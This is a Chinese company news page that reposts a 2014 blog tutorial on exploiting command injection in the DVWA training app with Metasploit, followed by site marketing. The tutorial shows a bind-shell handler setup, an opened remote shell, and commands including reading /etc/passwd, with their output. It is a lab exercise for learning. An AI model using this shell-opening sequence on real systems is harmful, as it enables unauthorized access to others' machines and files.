尧图网络科技YAOTU DIGITAL 获取报价
获取报价
首页 / 资讯中心 / 文章详情

【2014-04-27】使用metasploit来命令注入DVWA

发布时间:2026/9/25 0:44:23

资讯中心
01
ARTICLE

【2014-04-27】使用metasploit来命令注入DVWA

【2014-04-27】使用metasploit来命令注入DVWA
[历史归档]本文原发布于 cstriker1407.info 个人博客内容为历史存档仅供参考。发布时间2014-04-27 标题使用metasploit来命令注入DVWA分类操作系统 / 安全 标签DVWA·命令注入·metasploit使用metasploit来命令注入DVWA笔记仅供学习交流使用请勿进行其他用途当【 发现命令注入漏洞 】之后我们可以使用metaploit这个框架来利用这个漏洞。首先使用nc命令来打开端口然后我们启动metasploit然后输入下面的命令rootkali:~# msfconsole。。。。。 。。。。。 msfuse multi/handler msf exploit(handler)setPAYLOAD linux/x86/shell/bind_tcp PAYLOADlinux/x86/shell/bind_tcp msf exploit(handler)show options Module options(exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options(linux/x86/shell/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT4444yesThe listen port RHOST no The target address Exploit target: Id Name -- ----0Wildcard Target msf exploit(handler)setRHOST192.168.168.109 RHOST192.168.168.109 msf exploit(handler)exploit[*]Starting the payload handler...[*]Startedbindhandler[*]Sending stage(36bytes)to192.168.168.109[*]Command shell session1opened(192.168.168.104:35910 -192.168.168.109:4444)at2014-04-2718:23:07 0800iduid1(daemon)gid1(daemon)组1(daemon)whoamidaemoncat/etc/passwd 。。。。。 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 。。。。。
02
RELATED NEWS

相关资讯

更多网站建设与数字化升级内容

03
WHY YAOTU

想打造同款高转化官网?

懂行业、懂生意,从建站到增长一站式陪跑

◈

场景化定制

不做模板站,围绕你的业务场景量身设计,小众不撞款。

◐

营销型架构

以转化目标组织内容与路径,让官网真正带来询盘。

▲

全周期服务

设计、开发、运营、运维一体,上线只是开始。

免费获取你的建站方案

留下需求,专属顾问 24 小时内为你输出方案建议。